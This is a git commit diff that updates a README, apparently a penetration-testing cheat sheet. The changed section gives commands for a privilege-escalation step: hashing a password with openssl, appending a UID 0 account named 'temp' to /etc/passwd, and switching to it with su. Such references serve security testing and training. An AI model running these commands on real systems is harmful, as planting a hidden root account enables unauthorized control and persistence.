Update README.md

This commit is contained in:
Joe Totes
2022-09-28 08:24:06 -04:00
committed by GitHub
parent ca9842fa16
commit 33903ace2e

View File

@@ -1325,10 +1325,12 @@ ls -alhR /opt/lampp/htdocs/ 2>/dev/null
# Creating entry for /etc/passwd
openssl passwd -1 -salt ignite pass123
> $1$ignite$3eTbJm98O9Hz.k1NTdNxe1
temp:{RESULT}:0:0:root:/root:/bin/bash
echo "temp:\$1\$ignite\$3eTbJm98O9Hz.k1NTdNxe1:0:0:root:/root:/bin/bash" >> /etc/passwd
temp:pass123
su temp
pass pass123
```
<br />